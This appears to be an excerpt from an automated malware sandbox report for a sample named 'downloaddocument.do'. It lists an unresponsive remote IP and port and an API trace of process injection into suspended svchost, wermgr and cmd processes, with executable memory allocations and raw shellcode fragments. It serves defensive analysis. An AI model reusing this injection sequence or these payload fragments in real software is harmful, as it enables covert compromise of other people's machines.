Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

194.146.249.137:443

Executed a process and injected code into it, probably while unpacking (50 out of 1828 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Aug. 3, 2021, 7:43 a.m.	thread_identifier: 1332 thread_handle: 0x00000118 process_identifier: 2256 current_directory: C:\Windows\system32 filepath: track: 1 command_line: C:\Windows\system32\cmd.exe filepath_r: stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x0000011c	1	1
CreateProcessInternalW Aug. 3, 2021, 7:43 a.m.	thread_identifier: 2876 thread_handle: 0x0000011c process_identifier: 2888 current_directory: C:\Windows\system32 filepath: track: 1 command_line: C:\Windows\system32\wermgr.exe filepath_r: stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x00000118	1	1
CreateProcessInternalW Aug. 3, 2021, 7:37 a.m.	thread_identifier: 620 thread_handle: 0x00000000000003f4 process_identifier: 2488 current_directory: filepath: track: 1 command_line: C:\Windows\system32\svchost.exe filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000000000000408	1	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000090000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1	0
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: UAVVWSHì`Hl$`HäðHùë0H¨ÇGXHOÿW0HHWA¸ÿÿÿÿE3ÉÿWkGX D$\D$\ø uWHw`HkFHD$PHD$PH=u\HFHLV@L^8H^0LN(LF HNHVHD$8LT$0L\$(H\$ ëpD$\øÅ3Àé\ÿÿÿHD$PH=«uPHFPH^HLV@L^8Lv0LN(LF HNHVHD$@H\$8LT$0L\$(Lt$ ÿH ¸éóþÿÿH\|$PtHD$PHø9uLF HNHVÿëÌÿëÈHD$PHøuHNÿëµHD$PHø&GÿÿÿHNHVÿëHÇ¨HHWE3ÀE3ÉÿWHÿW(HÇHOÿW(HÇG3ÉÿW83ÀHå[_^A^]ÃÌÌÌÌÌÌUVHì(Hl$ HäðHuPHöt@HEHM@HVpLFxLÉHHH¶HNÿV0HNºÿÿÿÿÿV He^]Ã base_address: 0x0000000000090000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000000a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1	0
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: H¹ H¸ ÿà base_address: 0x00000000ff2c246c process_identifier: 2488 process_handle: 0x0000000000000408	1	1
NtResumeThread Aug. 3, 2021, 7:37 a.m.	thread_handle: 0x00000000000003f4 suspend_count: 1 process_identifier: 2488	1	0
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 774144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000180000000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0x0000000000000408	1	0
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x0000000180000000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x0000000000000408	1	0
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1	0
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: VERSION.dll base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1	0
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: oåv base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1	0
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: GetFileVersionInfoA base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1	0
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6ævxüþ base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1	0
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: VerQueryValueA base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1	0
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6ævxüþ base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1	0
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: GetFileVersionInfoSizeA base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1	0
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6ævxüþ base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1	0
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: KERNEL32.dll base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1	0
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: oåv base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1	0
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: GetLastError base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1	0
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6æväv base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1	0
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: EnterCriticalSection base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1	0
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6æväv base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1	0
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: LeaveCriticalSection base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1	0
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6æväv base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1

downloaddocument.do

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All